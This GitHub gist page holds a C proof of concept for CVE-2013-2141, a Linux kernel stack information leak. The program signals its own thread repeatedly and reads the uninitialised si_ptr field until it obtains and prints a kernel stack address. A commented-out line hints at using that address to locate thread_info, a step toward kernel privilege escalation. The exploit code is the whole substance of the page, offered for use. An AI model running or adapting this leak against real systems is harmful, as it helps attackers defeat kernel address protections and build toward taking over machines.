Skip to content

Instantly share code, notes, and snippets.

@Fuzion24

Fuzion24/CVE-2013-2141.c

Created September 4, 2014 03:25
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Fuzion24/3f4745ccbba635c591cd to your computer and use it in GitHub Desktop.
Save Fuzion24/3f4745ccbba635c591cd to your computer and use it in GitHub Desktop.
Download ZIP
Kernel Stack Leak: CVE-2013-2141
Raw
CVE-2013-2141.c
#include <stdio.h>
#include <signal.h>
#include <string.h>
/*
CVE-2013-2141
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b9e146d8eb3b9ecae5086d373b50fa0c1f3e7f0f
*/
void * kernel_stack_address = NULL;
static void sig_handler(int sig, siginfo_t *siginfo, void *ctx)
{
kernel_stack_address = siginfo->si_ptr;
}
void * getKernelStackAddress(){
while(kernel_stack_address < 0xBF000000){
struct sigaction act = {
.sa_sigaction = &sig_handler,
.sa_flags = SA_SIGINFO
};
if (sigaction(SIGUSR1, &act, NULL) < 0) {
perror ("sigaction");
return 1;
}
tkill(gettid(), SIGUSR1);
sleep(2);
}
printf("kstack : %p\n", kernel_stack_address);
return kernel_stack_address;
}
int main (int argc, char *argv[])
{
void * possKernelStackAddr = getKernelStackAddress();
// void * possibleThreadInfo = (possKernelStackAddr & 0xFFFFE000);
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment